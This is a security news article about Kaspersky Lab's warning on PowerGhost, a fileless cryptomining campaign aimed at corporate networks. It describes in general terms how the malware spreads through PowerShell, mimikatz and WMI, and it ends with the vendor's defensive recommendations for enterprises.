lolloj - Fotolia

Brace for PowerGhost cryptominer, warns Kaspersky Lab

Corporate networks are the target of a new illicit cryptocurrency mining malware that is difficult to detect and eradicate, security researchers warn

New malware designed to generate funds for cyber criminals using hijacked computing resources to generate cryptocurrencies – also known as cryptojacking – is sweeping the globe, starting in South America, according to security firm Kaspersky Lab.

This is the latest development in a rising trend of cyber criminals using cryptominers in targeted attacks to generate funds.

As this trend grows and overtakes ransomware as the most popular fundraising activity by cyber criminals, Kaspersky Lab said enterprises will be put at risk as miners sabotage and slow down their computer networks, damaging overall business processes.

This latest cryptojacking malware campaign, dubbed PowerGhost, is noteworthy for businesses as it appears to be focused on corporate environments in attacks in Brazil, Colombia, India and Turkey. The malware has also been detected in low concentrations so far in the US, Canada, Western Europe and Russia.

PowerGhost also uses multiple fileless techniques to gain a foothold in corporate networks, which means the miner does not store its body directly onto a disk, increasing the complexity of its detection and remediation, researchers said.

Machine infection occurs remotely through exploits or remote administration tools, said Kaspersky Lab researchers. When the machine is infected, the main body of the cryptominer is downloaded and run without being stored on the hard disk.

“During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive,” the researchers said in a blog post.

Once this has happened, cyber criminals can arrange for the miner to automatically update, spread within the network, and launch the cryptomining process.

With the help of mimikatz, researchers said the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching the one-line script that downloads the miner’s body via WMI (Windows management instrumentation).

“PowerGhost raises new concerns about cryptomining software as threat actors turn their attention to enterprises,” said David Emm, principal security researcher at Kaspersky Lab.

“Illicit cryptocurrency mining is set to become a huge threat to the business community.”

To reduce the risk of infection with cryptominers, enterprises are advised to:

  • Always keep software updated on all devices.
  • Use tools that can automatically detect vulnerabilities to ensure security updates are applied.
  • Consider less obvious targets, such as queue management systems, POS terminals and even vending machines because such equipment can also be hijacked to mine cryptocurrency.
  • Use a dedicated security solution that is empowered with application control, behaviour detection, and exploit prevention components that monitor the suspicious actions of applications and block malicious file executions.
  • Protect the corporate environment, educate employees and IT teams, keep sensitive data separate, and restrict access.

Read more on Hackers and cybercrime prevention

Data Center
Data Management